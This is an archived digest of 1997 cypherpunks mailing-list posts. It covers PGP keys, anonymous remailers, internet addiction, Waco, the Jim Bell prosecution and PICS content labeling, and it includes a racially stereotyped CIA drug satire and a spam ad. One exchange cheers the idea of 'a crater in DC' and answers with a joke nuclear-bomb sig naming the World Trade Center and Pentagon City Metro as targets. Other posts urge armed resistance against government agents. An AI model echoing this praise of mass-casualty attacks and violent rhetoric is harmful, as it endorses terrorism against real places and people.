Subject: CIA unveils new ghetto drugs for '98
Message-ID: 




--- begin forwarded text


Resent-Date: Mon, 18 Aug 1997 09:31:56 -0400
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef at substance.abuse.blackdown.org
Subject: CIA unveils new ghetto drugs for '98
Date: Mon, 18 Aug 1997 09:32:41 -0400
From: glen mccready 
Resent-From: 0xdeadbeef at substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef at substance.abuse.blackdown.org> archive/latest/2124
X-Loop: 0xdeadbeef at substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request at substance.abuse.blackdown.org


Forwarded-by: Nev Dull 
Forwarded-by: chuck yerkes 
Forwarded-by: Alex Reith 

LANGLEY, VA -- After months of eager anticipation within the nation's
ghetto communities, the Central Intelligence Agency unveiled its 1998 line
of addictive drugs Monday.

"The wait is over," CIA Director George Tenet said at the festive drug
launch, simulcast on giant-screen TVs throughout Watts, Cabrini Green,
Newark, and other urban areas. "Inner-city Americans now have four
exciting new ways to narcotize themselves, with the quality of product
and wide distribution they've come to expect from the CIA."

Reaction to the new drugs (see sidebar) was overwhelmingly positive.
"They had a tough act to follow after crack," said New York-area Mafia
boss Alfonse DiBiasi, Tenet's close friend and former college roommate.
"But this new stuff is just as cheap and every bit as addictive. We're
all very excited."

President Clinton praised the CIA as well. "This is a win-win situation
for all Americans," he said. "Inner-city Americans will receive the
powerful drugs they love, and the CIA will raise the funds they can't get
from Congress to get their Jonestown mind-control experiment up and
running again."

The new drugs are supported by months of CIA testing to ensure maximum
potency and addictiveness. Focus groups, consisting primarily of homeless
men and street orphans culled from ghettos around the country, were housed
in an underground research facility beneath CIA headquarters in Langley,
VA. Only after six months of exhaustive experimentation on members of this
target demograph, who sampled hundreds of drugs, were the final decisions
made.

"Everybody loves me because I am so beautiful. Anything is possible. I am
going to live a very long and happy life," said Oakland, CA, native
Charles Simmons, who spent 10 weeks testing Blue Glass, the CIA's new
smokable euphoric drug. Simmons then leapt out a window to his death.

"I they I drugs these are very feel good right," said Dwayne Woodson of
Bronx, NY, another CIA test participant. "Pork chops three for $2.99."

CIA officials said that testing is necessary in order to avoid releasing
potentially dangerous substances into the ghettos.  "One initially
promising drug was later discontinued due to undesirable side effects,
such as increased intelligence and feelings of love for others," said Dr.
Harold Vandermeer, head of the CIA's narcotics development team.

Initial product rollout began this week in the ghetto neighborhoods of
Los Angeles, Detroit and New Orleans, with all residents receiving a
special drug-sampler pack in the mail, including a full-color,
English-Spanish promotional pamphlet and instructional videotape. If the
market response is as favorable as the CIA expects, the drugs should be
available in every ghetto in the nation as soon as September 1st.

"I thought I'd never say this," Tenet said, "but put down that crack pipe,
ghetto-dwellers: You're going to love these new drugs."

Tenet went on to state that none of the above events "ever happened" and
categorically denied any CIA connection with the new drugs.

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From whgiii at amaranth.com  Tue Aug 19 07:43:19 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Tue, 19 Aug 1997 22:43:19 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: 
Message-ID: <199708191419.JAA00935@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/19/97 
   at 02:32 PM, ? the platypus {aka David Formosa}
 said:

>On Sun, 17 Aug 1997, David Downey wrote:

>[...]

>> Even though you can generate 
>> RSALIB based keys, why do so when there is a newer and better algorythm 
>> supplied with the 5.0?

>I will be useing PGP to sign NoCeMs and I wish to maximise the number of
>peaple will be able to use my posts.  For this I would have to use the
>old size key untill PGP5.0 gets a signifigent market share.

Well an OS/2 version of PGP 5.0i should be available shortly and there is
work being done for a dos & atari versions. Of cource a Unix version is
already available along with the Win95/NT & Mac versions available from
PGP Inc. & MIT.

It will not be long before PGP 5.0 is available for the majority of
platforms currently being used on the desktop.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/mdeY9Co1n+aLhhAQGGCAP+P+aN9apkHx+70x3TdhZ6c5H5RXXBhIQQ
SCsEcJhONsrQWL/oI6ZmyxWID5jsAjuSrScJ5IYW4p6VTVEnaear3ZrMDvIpH/59
O7lJZfUIWjpO3WTrGtwNaMrvYd+e69uOzrwWMh1r3rU3wUggybmJKRwa7zoKUP8j
dhBQy5YAAO8=
=vUwn
-----END PGP SIGNATURE-----






From rah at shipwright.com  Tue Aug 19 08:05:55 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 19 Aug 1997 23:05:55 +0800
Subject: It's Official...
Message-ID: 



The ganglia, as they say, twitch...

Cheers,
Bob Hettinga
--- begin forwarded text


Date: Tue, 19 Aug 1997 10:20:16 -0400
From: rah-web 
Reply-To: rah at shipwright.com
MIME-Version: 1.0
To: Robert Hettinga 
Subject: It's Official...

http://www.techweb.com/wire/news/aug/0813addict.html


                        August 19, 1997

                  It's Official: Net Abusers Are
                  Pathological
                  (08/13/97; 7:00 p.m. EDT)
                  By Evan Schuman, TechWire

                  CHICAGO -- Another yardstick of
                  success will be achieved by the
                  Internet community on Thursday: It
                  will be awarded its first official
                  mental health disorder.              For Related
                                                       Stories:
                  The newly identified disorder will
                  be dubbed Pathological Internet Use  Fatal
                  (PIU) and will be christened during  Distraction? --
                  the presentation of a major medical  Learning The
                  paper at the annual convention of    Signs Of Online
                  the American Psychological           Addiction--HomePC
                  Association in Chicago.
                                                       We're Becoming
                  The term is being coined by Dr.      Cyber
                  Kimberly Young, an assistant         Junkies--Electronic
                  professor of psychology at the       Engineering
                  University of Pittsburgh at          Times
                  Bradford, in Bradford, Pa. With her
                  paper's presentation, the APA will
                  classify excessive Internet use as
                  addictive, in the same way that
                  drugs (including alcohol), gambling,
                  video games, and some types of
                  eating disorders are today
                  officially considered addictive.

                  Like those other ailments, Internet
                  addiction starts when the rest of
                  the person's life starts to fall
                  apart, the paper stated. The
                  Internet is a fine hobby or work
                  tool, until it causes problems with
                  social partners, work, or school,
                  Young said.

                  Young studied 396 cases of
                  PIU-afflicted people and drew some
                  overall conclusions.

                  Net marketers need not fear, as
                  traditional Web surfing accounted
                  for only 7 percent of the Internet
                  addicts and even more
                  information-oriented tools (gophers
                  [Image] and FTP[Image] sites, for
                  example) represented only an
                  additional 2 percent.

                  "Upon examination, traditional
                  information protocols and Web pages
                  were the least utilized compared
                  with more than 90 percent who became
                  addicted to the two-way
                  communication functions: chat rooms,
                  MUDs [Multi-User Dungeons],
                  newsgroups, and E-mail," Young said.
                  "This makes the case that database
                  searches -- while interesting and
                  often time-consuming -- are not the
                  actual reasons Dependents become
                  addicted to the Internet."

                  Young said one surprise in the
                  results was the lack of high-tech
                  people among the addicted. "While it
                  is a common perception that those
                  addicted to the Internet are
                  computer savvy individuals, these
                  demographic results show that only 8
                  percent came from high-tech jobs,"
                  she said. "Compare this to the 42
                  percent who indicated having no
                  permanent jobs and the 39 percent
                  who worked in low-tech fields. It is
                  typically newbies who become
                  excessive Internet users."

                  Among the jobs that she classified
                  as low-tech were secretaries, bank
                  tellers, teachers, advertising
                  executives, and journalists.

                  The report said that the attraction
                  of the Internet revolves around its
                  perceived anonymity, where people
                  feel comfortable acting out in ways
                  they would never consider in real
                  life.

                  "The ability to enter into a
                  bodiless state of communication
                  enabled users to explore altered
                  states of being that fostered
                  emotions that were new and richly
                  exciting," Young said. "Such
                  uninhibited behavior is not
                  necessarily an inevitable
                  consequence of visual anonymity, but
                  depends upon the nature of the group
                  and the individual personality of
                  the online user."

                  "For those who felt unattractive, it
                  was perceived easier to pick up
                  another person through cybersex than
                  in real life," she said.

                  But beyond sexual issues, newsgroups
                  and chat lines allow people to
                  literally create and secretly test
                  new personalities before trying them
                  out in the real world. "Beyond
                  amusement, reinventing oneself is a
                  way to fulfill an unmet need. The
                  loss of a social identity online
                  allows one to reconstruct an ideal
                  self in place of a poor
                  self-concept," Young said. "Those
                  who suffer from low self-esteem,
                  feelings of inadequacy, or frequent
                  disapproval from others are at the
                  highest risk" of becoming Net
                  addicts.

                  She quoted one participant in the
                  survey as telling her, "By day, I am
                  a mild-mannered husband, but at
                  night I become the most aggressive
                  bastard online."

                  The addiction can become a problem
                  when the new emotional creation
                  makes inroads into real lives or
                  when the time spent in the virtual
                  life takes away from
                  responsibilities in the real life.

                  The addicted Internet user will
                  spend an average of 38 hours per
                  week online dealing with
                  nonemployment/nonacademic efforts,
                  compared with "nonaddicts" in the
                  survey who averaged eight hours.
                  Almost half of the participants
                  diagnosed with PIU reported that
                  they get less than four hours of
                  sleep per night due to late log-in
                  sessions.

                  Another reason for some of the
                  addictions is the sense of community
                  that some newsgroups create. "With
                  routine visits to a particular group
                  (chat area or newsgroup, for
                  example), a high degree of
                  familiarity among other group
                  members is established.

                  Like all communities, the cyberspace
                  culture has its own set of values,
                  standards, language, signs, and
                  artifacts, and individuals adapt to
                  the current norms of the group,"
                  Young said.

                  "One can easily become involved in
                  the lives of others almost like
                  watching a soap opera and thinking
                  of the characters as real people,"
                  she said.

                  Young's report said that this is
                  especially attractive to people who
                  might find it difficult to establish
                  other social circles. "Homebound
                  caretakers, the disabled, retired
                  individuals, and homemakers have
                  limited access to others," she said.

                  Internet addiction centers have
                  already been created at facilities
                  ranging from the University of
                  Maryland at College Park to Proctor
                  Hospital in Peoria, Ill., to Harvard
                  affiliate McLean Hospital.

                  The test group broke down into 157
                  men and 239 women; the average age
                  for the males was 29, and the
                  average age for the women was 43.
                  [end]

                   WHAT CONSTITUTES PATHOLOGICAL INTERNET USE?

                   Do you:

                     1. feel preoccupied with the Internet (i.e.,
                        thinking about the Internet when offline)?

                     2. feel a need to use the Internet with increasing
                        amounts of time in order to achieve satisfaction?

                     3. have an inability to control your Internet use?

                     4. feel restless or irritable when attempting to cut
                        down to stop Internet use?

                     5. use the Internet as a way of escaping from
                        problems or of relieving a poor mood (i.e.,
                        feelings of helplessness, guilt, anxiety, or
                        depression)?

                     6. lie to family members or friends to conceal the
                        extent of involvement with the Internet?

                     7. jeopardize or risk the loss of significant
                        relationship, job, educational or career
                        opportunity because of the Internet?

                     8. after spending an excessive amount of money on
                        online fees, often return another day?

                     9. go through withdrawal when offline (e.g.,
                        increased depression, anxiety, etc.)?

                    10. stay online longer than originally intended?

                   Individuals who met four or more of these criteria
                   during a 12-month period were classified as dependent.

                   Take the full survey, and find out if you're addicted
                   to the Net.

                   source: the University of Pittsburgh at Bradford

                              Search for more related stories:

                                        [Techsearch]
                               Search TechWire & CMP Archives



                 [Image]

                       C M P n e t   S P E C I A L   R E P O R T S
                � Can't find a 56-Kbps Internet service provider?  [Image]
                Here's help for you.
                � Internet Explorer 4.0 got you perplexed? Ask Dr. 4.
[Image]        [Image]
                � There's an intranet for every company, but not the same
                one for everyone.

    [Image]     � How come Internal users don't like Sun's JavaStation NC?
   [CMPnet]    [Image] [Click Here To Visit Canon!]
[Image]

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From patrick at atro.pine.nl  Tue Aug 19 08:11:22 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Tue, 19 Aug 1997 23:11:22 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.2.32.19970818211433.00694684@popd.netcruiser>
Message-ID: <199708191457.QAA25679@atro.pine.nl>



> 
> 
> Is there any Eudora plug-in that allows anyone using Eudora to operate a
> remailer?  I would think that if anyone with Eudora and an email account
> can chain remail PGP encrypted messages for others a la mixmaster, etc. it
> would be much harder to shut down 40,000 remailers tham 40.
> 
> Jonathan Wienke

Try the winsock remailer: http://www.cyberpass.net/~winsock/

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From jya at pipeline.com  Tue Aug 19 08:21:47 1997
From: jya at pipeline.com (John Young)
Date: Tue, 19 Aug 1997 23:21:47 +0800
Subject: Waco FU-CU
Message-ID: <1.5.4.32.19970819150211.007444d0@pop.pipeline.com>



Tim's mention of cypherpunks reaction to Waco savagery at
the time prompts an offer of the NYT firebrand today on nationwide
reaction to the film, "Waco: The Rules of Engagement," which
is revealing an upsurge in anti-government questioning of the
official story, and "not just from the wacko right" says one of
the leftist filmmakers:

   http://jya.com/waco-rules.htm

Audience members boo Attorney General Reno and "any other
figure of authority in the film."

For the officials' growing record of the "still smoldering story," see the
Treasury Deapartment's file on the Waco Administrative Review 
Group Investigation:

   http://jya.com/treas-do-waco.txt

It's fair to guess that FBI has a similar cache on deer-killing dissidents
in the national interest, but it's not flaunted to wolf-freak the sheep in the 
feebs "privacy" file, unlike Treasury's baiting of "for law enforcement use 
only" -- Tim's aptly acronymed FLEUO replacing FU-CU.







From zooko at xs4all.nl  Tue Aug 19 08:38:58 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Tue, 19 Aug 1997 23:38:58 +0800
Subject: write up AP for FC++
Message-ID: <199708191517.RAA27971@xs1.xs4all.nl>




 A million monkeys operating under the pseudonym
 "Ian Grigg " typed:
>
> Zooko said:
> > [ some mega-monkey drivel about all these ideas being the same ]
> 
> More intellectual peasantry.  There is more to an idea than who came
> up with it first and whether it is related at some level or other to
> another concept with a different name.


Indeed there _is_ more to many ideas.  Unfortunately, there is
no more to this one.


Regards,

Zooko, Bane of Bogus Daydreams Posing As Ideas






From frissell at panix.com  Tue Aug 19 08:44:33 1997
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 19 Aug 1997 23:44:33 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <199708190730.JAA00747@basement.replay.com>
Message-ID: <3.0.2.32.19970819111508.03721e8c@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 09:30 AM 8/19/97 +0200, Anonymous wrote:
>  Jim Bell was like manna from heaven for the IRS. It gave them an
>opportunity to bring down the fascist forces of a wide variety of
>government agencies to back the IRS's play in this instance.
>  Bell's persecution was not a mistake, it was a loud and clear
>message to the taxpaying sheeple that they are "a felon under an
>increasing number of laws," and that the IRS has a plethora of
>government agencies ready and willing to join them in fucking 
>over anyone who gets out of line.

It would have turned into a mistake if Bell had had balls to match his mouth. 
 The Feds hate to lose prosecutions like this because loses encourage the 
activists in the population to resist.

DCF


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/m4eIVO4r4sgSPhAQEHEAP9EObRrHNl02FuYbliKI/nxDLVHonZScmg
j9kah/zAAB8o2Yvs7Gq+8pnrVWMVuZTMD9uO9aQrvsv0xL1vmk4+STyn2GCUmDya
PNIE85fslohkBEgnZpJi9DyjBmkk2rhmTu3uhzwi84/jhGUJqNErB9dxswSJSKg6
vrmWXjO2p6I=
=BHMM
-----END PGP SIGNATURE-----






From frissell at panix.com  Tue Aug 19 09:04:31 1997
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 20 Aug 1997 00:04:31 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: <3.0.2.32.19970819110226.03729fe0@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

>And there is Clinton's Anti-Terrorism Act, which explicitly makes certain
>kinds of financial and other activities illegal, even by Americans, which
>involve support of "terrorist" organizations. It is not inconceivable that,
>following outlawing of strong crypto in various countries, that the
>Cypherpunks group gets classified as an organization or group which
>supports terrorist goals, which is almost certainly true.)

State is lagging in issuing the terrorist organization list required by this 
law.  It is believed that they are chicken because most of the groups would 
be Moslem groups and this would be considered a politically incorrect 
denigration of a "protected group."  Then they'd have to put the IRA on the 
list as well and that would cause controversy.  If they never issue the 
list...

In any case, I don't think that we have to worry because we don't fund 
anyone.  We just send non-cash bits.  The law requires that a foreign 
terrorist group on the "Attorney General's List" (actually State Department) 
receive money or physical support.  I suppose remailers could be targetted 
but that would make for an interesting case since anonymnity remains 
protected.

DCF

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/m1e4VO4r4sgSPhAQHXpAQAybcf69TTBLv8BpCZxJ+c6voZLHyd01Yo
bLmYzXc4wMJ/mSOcn0YpJ+0X3nwdWBUiPv3SoWxUHVjGTLsHR+a8Py7POfDZ5Yxf
roGnPSyhNwp0ItQONGE1BErNbz7fVOHXdhitPotIXdYeflTV1N0HWZnPPkToX/Sh
D1HqJ2osUWQ=
=ZL9P
-----END PGP SIGNATURE-----






From trevorg at dhp.com  Tue Aug 19 09:27:33 1997
From: trevorg at dhp.com (Trevor Goodchild)
Date: Wed, 20 Aug 1997 00:27:33 +0800
Subject: Cypherpunks as a Terrorist Organization
Message-ID: 



On Mon, 18 Aug 1997, Tim May wrote:
 
> First, the rise of search engines, archives, and employers routinely
> running DejaNews and other search engine checks on potential employees
and
> consultants to see what sorts of folks they are. (Whether being active
on
> the Cypherpunks list will nix a job is pretty unlikely, but it's still a
> worry to some.)
 
Hey Tim, speaking of DejaNews, how soon do you think it will be before
there is a Ministry of Truth (minitru) in place to correct incorrect
postings of the past, to update them a bit and airbrush out those who, um,  
never existed?
 
> of sorts. But many have been investigated, and, as John Young noted
> recently, the IRS treats membership in certain organizations as a
threat.
> And there is Clinton's Anti-Terrorism Act, which explicitly makes
certain
> kinds of financial and other activities illegal, even by Americans,
which
> involve support of "terrorist" organizations. It is not inconceivable
that,
> following outlawing of strong crypto in various countries, that the     
> Cypherpunks group gets classified as an organization or group which
> supports terrorist goals, which is almost certainly true.)
 
No bigger a threat than the HUAC saw those who didn't believe the Hoover
vision.  Nothing's really changed since then other than the faces and the  
names.  The issues remain.
 
> Fourth, the arrest and prosecution of Jim Bell, with tax evasion and a
> minor stink bomb case turned into a "federal case" because of his
> controversial views. This has obviously angered and radicalized many.
Some
> of us have stocked up on more asault weapons and shotguns, placed alarms
> around our property, and we are expecting a "raid." As I have said, if  
> black-clad ninja raiders try to hit me, I'll assume they're "home
invaders"
> and will open fire. (A Sheriff's Deputy once told me that even saying I 
> would defend my home against unwelcome intruders constituted a "threat"
and
> that he might order a detachment to visit my compound. So far, two years
> later, he hasn't made good on _his_ threat. And now I'm more ready for
him
> than ever.)
 
A theat to him perhaps.  What ever happened to self defense I wonder?     
 
> So, "B.," stop apologizing for reading the list. You're already a marked
> man in their eyes...and search engines can already identify the True
Name
> who is posting the last year or two as "Zooko Journeyman." In a couple
of
> years, all search engines will have "known aliases" macros to
automatically
> ferret out the web of pseudonyms linkable to a poster. You can run, but
you
> can't hide.
 
Not unless he joins the book people in the woods. :)
 
 
> And "democracy" is spinning out of control, being used by authoritarians
to
> convert the world into a security state. Restrictions on travel, new
drug
> laws, laws against images and words on the Net, and thousands of new
laws
> every years.
 
Congress was indeed a horrid idea.  We need no laws other that "do what
you will as long as you don't physically injure, or steal."  All else is
congressional bullshit paid in bloody tax money.
 
> A frontal assault, using strong crypto to aid in the attacks by freedom 
> fighters and to destablize authority, makes more sense. When a
government
> official decrees that citizen-units may no longer do certain things
which
> were once quite legal and quite common (such as owning a gun for
defense),
> that official must expect certain repercussions.
 
A few years back when the anti-gun crap started in NYC, they had all sorts
of save the kids propaganda stories and projects: such as trade your gun
for a toy, and stories like 8 year old shot dead by drug deal for
threatening to use water pistol.
 
> We're in a state of war with the statists and tyrants. It's what
Jefferson
> and the other Founders expected to happen, and now the watering with the   
> blood of patriots and tyrants is happening.
 
Some war.  We've already lost.  The Big Brother machine is already in
place and has been since Hoover.  Jim Bell was arrested for thinking
differently than is allowed.  No different than being declared insane and
sent to the Gulag for "re-education" for disagreement with the party, the  
glorious party.  Not having lived in communist or fascist countries, the
sheeple are asleep.
 
My parents having left a socialist state (read fascist) for freedom, I
find freedom fleeting.  The same scum that ran the communist block are
here running our country.  Sure they were born here, but their spirit and 
beliefs are the same as the scum that were in power in the old country.   
 
How much money are we to bleed to them in taxes (read plural, as in
income, realestate, hotel, parking, gas and electric, telephone, taxes on
tax returns, etc.)?  How soon before breathing taxes? Fucking Taxes?
Living Taxes?  Speaking Taxes?  Let's not pretend.  We work for them.
It's mandatory work.  Our work pays their goals.  Doesn't matter if you
work for Mickey D's or Mickey Soft.  You pay Big Uncle.  You work for Big
Uncle's benefit.  It's not enough to fear Big Uncle.  You must love big   
uncle.  One may not even hold anti-government views for fear of being in
contempt of court and be judged against.
 
> It's what the Founders expected.  Get used to it.
 
How soon before they stop teaching highschool kids about the revolution
for fear it will happen again?  How soon before they edit the constitution
and pretend it was always that way?  How soon before we'll need passports
to travel between one part of the country and another?  Between one 'burb
to another?

 
How soon before we have to register every computer out there?  How soon
before we have to register every phone and phone card?  Every pencil and   
knife and fork and other sharp objects? How soon before night curfews?
How soon before Victory Coffee and Gin?  How soon to food rations?  How
soon to electricity rations and water rations and net access rations? How
soon before ex-communist Russia has more freedom than we?
 
They've already silenced us, they've already taken our guns, they've
already thrown us in jail for feeding others, for speaking, thinking and  
protesting, and demanding privacy, they've already stripped our privacy,   
they've already murdered us, they've already licensed everything we can do 
and can't, they've already filled the streets with jackbooted gun and
nightstick toting thugs who wear blue and use bathroom plungers as means
of interrogation.
 
What next?  And how soon?
 


---
 Trevor Goodchild






From helledge at oilfieldtrash.com  Wed Aug 20 00:36:06 1997
From: helledge at oilfieldtrash.com (helledge at oilfieldtrash.com)
Date: Wed, 20 Aug 1997 00:36:06 -0700 (PDT)
Subject: Don't call if you are already rich!
Message-ID: <199708200735.AAA05533@toad.com>


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////

If you are already rich, don't call this toll free number.          1-800-811-2141
                                                                                              CODE 44393





From stewarts at ix.netcom.com  Tue Aug 19 09:47:02 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Wed, 20 Aug 1997 00:47:02 +0800
Subject: None
In-Reply-To: 
Message-ID: <3.0.2.32.19970819091055.02f537ac@popd.ix.netcom.com>



At 09:09 PM 8/18/97 EDT, Dr.Dimitri Vulis KOTM wrote:
>Anonymous  writes:
>> It would be a day to celebrate loudly if someone put a crater in DC.
>I'd love for this to happen!  I wish someone would condense the instructions
>for making nukes in one's garage into 4-6 lines suitable for .sigs.

---------------------------------
Nukes 101: Steal two 4kg pieces of plutonium and a cannon barrel.
Use explosives to slam them together.  Wear yer lead underwear, fat man!
---------------------------------
It'll probably just give you a messy nuclear fizzle, but that's not bad
for the Pentagon City Metro station or World Trade Center parking lot.



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Tue Aug 19 09:47:37 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Wed, 20 Aug 1997 00:47:37 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818234422.038013f4@mail.atl.bellsouth.net>
Message-ID: <3.0.2.32.19970819090006.0077da04@popd.ix.netcom.com>



At 09:14 PM 8/18/97 -0700, Jonathan Wienke wrote:
>Is there any Eudora plug-in that allows anyone using Eudora to operate a
>remailer?  I would think that if anyone with Eudora and an email account
>can chain remail PGP encrypted messages for others a la mixmaster, etc. it
>would be much harder to shut down 40,000 remailers tham 40.

Joey Grasty's Winsock Remailer isn't a Eudora plug-in, but it does
let you use a standard POP3 mailbox to run the remailer from,
and has a mode that lets you share the mailbox between remailer and
non-remailer mail.  

If I remember right, it currently needs WIN3.1 due to some bugs 
that make it flaky on Win95, and I assume it only uses PGP 2.6.x
rather than the new PGP5.0 interfaces.  But it does know how to do
PGP-only mode.  

Eudora would be an interesting platform if you could convince the
plug-in to run along with your spam filters and the PGP plug-in
and have everything done in the right order.  You'd also have the problem
of putting the right headers on the message - it's nicer if it
can get a different From: header for remailer mail than for real mail,
so people who don't like remailer mail can flame you accurately :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From nobody at neva.org  Tue Aug 19 09:49:05 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 20 Aug 1997 00:49:05 +0800
Subject: W3C on PICS
Message-ID: <199708191642.JAA00543@mail-gw.pacbell.net>





http://www.collegehill.com/ilp-news/reagle.html


f r o n t  p a g e  |  a b o u t  |  b a c k  i s s u e s  |  s u b s c r i
b e  |  a d v e r t i s e

 The ILPN discusses PICS with Joseph Reagle of the W3
 Consortium

 August 18th 1997

 Joseph Reagle Jr. joined the World Wide Web Consortium
 (W3C) in October of 1996 to focus on policy issues
 related to the development of global technologies and
 their relationship to social and legal structures.
 Specifically, how to promote "good" engineering when
 applied to a multifaceted and often contentious policy
 environment; one result of this activity is the W3C
 Statement on Policy. Mr. Reagle has also been working
 on filtering, digital signature, intellectual property
 rights management, and privacy capabilities on the Web.
 He has also been an active contributor to the
 development of the Platform for Privacy Preferences
 (P3) project at the W3C. P3 will enable computer users
 to be informed and to control the collection, use and
 disclosure of their personal information on the Web.�

 ILPN: How does PICS work?

 The Platform for Internet Content Selection (PICS) is
 an infrastructure for associating labels (metadata)
 with Internet resources. It was originally designed to
 help parents and teachers control what children access
 on the Internet, but it also facilitates other uses for
 labels, including code signing, privacy, agents, and
 intellectual property rights management.

 PICS allows organizations to easily define content
 rating systems, and enable users to selectively block
 (or seek) information. The standard is not a rating
 system (like MPAA or RSACi), but an encoding method for
 the ratings of those systems. Those encoded ratings can
 then be distributed with documents, or through third
 party label bureaus.

 ILPN: Can you summarize
 the origin of PICS as well
 as the coalition behind       [Related Links]
 its development? What role
 is W3C playing in the           The World Wide Web
 ongoing development and       Consortium PICS Site
 promotion of PICS?
                                 Family Friendly
 During 1995, a number of
 activities occurred that      Internet...The White
 were related to concerns      House Internet Content
 of children accessing         Filtering Plan.
 potentially inappropriate
 Web content:                    Australian
                               Anti-PICS Site
   1. The Senate Judiciary
      Committee heard            Ratings Now,
      testimony regarding
      the "Protection of       Censorship
      Children From            Tomorrow...from SALON
      Computer Pornography
      Act of 1995" (S. 892)      ACLU Press Release
   2. The Information          on the July White
      Highway Parental         House Summit
      Empowerment Group
      (IHPEG), a coalition       Foucault in
      of three companies
      (Microsoft               Cyberspace:
      Corporation, Netscape    Surveillance,
      Communications, and      Sovereignty and
      Progressive              Hard-Wired Censors ...
      Networks), was formed    an absolute must read
      to develop standards     article from James
      for empowering           Boyle, a law professor
      parents to screen        at Washington�College
      inappropriate network    of Law,
      content.                 American�University.
   3. A number of standards
      for content labeling were proposed including
      Borenstein's and New's Internet Draft "KidCode"
      (June 1995), the Voluntary Internet Self Rating by
      Alex Stewart and NetRate by Peter Wayner.
   4. A number of services and products for blocking
      inappropriate content were announced, including
      Cyber Patrol, CyberSitter, Internet Filter,
      NetNanny, SafeSurf, SurfWatch, and WebTrack.

 By August, the standards activity was consolidated
 under the auspices of the World Wide Web Consortium
 (W3C) when the W3C, IHPEG, and twenty other
 organizations agreed to merge their efforts and
 resources to develop a standard for content selection.
 The intent of the PICS project was to demonstrate that
 it was possible and better for individuals and families
 on the Internet to have control over the the
 information they receive, rather than creating a
 national framework for censorship.

 Today, the W3C believes PICS-based technology can
 fulfill the requirements of mediating access
 potentially offensive or illegal content. The next big
 step is educating the users on how to use those
 technologies. For the future, we are working on the
 Resource Description Framework as the basis for a
 richer metadata infrastructure. Applications such as
 our P3 privacy project will use it to enable sites to
 make privacy statements.

 ILPN: Can you describe the difference between
 'labeling' 'filtering' and 'blocking,' and why this set
 of distinctions might be important?

 Paul Resnick's PICS Options FAQ has a very good answer
 to this question and some of the others that you ask.
 To summarize, labels are statements. They have the
 capability to describe a Web page, or to make any
 arbitrary assertion. Obviously, people can use such
 information to block, or select what they want to see.
 To generalize, one can use metadata to "rate" a Web
 page with respect to some rating system. Given ratings,
 a user applies a filter (her preferences about the
 ratings) to determine which pages are most appropriate;
 some action is associated with the result of the
 filtering. The common result is the blocking or
 selection of a page, but the user could also be
 presented with a list of sites sorted according to her
 preferences.

 ILPN: What do you make of the opposition by EFF, the
 American Library Association and the Electronic Privacy
 Information Center to PICS? Do you see PICS as a
 bulwark of free speech, or simply as the lesser of two
 evils (the other being government regulation)?

 I would characterize the response from each of those
 organizations differently, and of course my response is
 based on my own understanding of that position:�

   1. The ALA does not oppose PICS or filtering in
      general. I believe they acknowledge its usefulness
      as a means of parental empowerment, but do not
      feel it is appropriate for installation on every
      computer by default in their libraries. I respect
      this point of view while acknowledging that
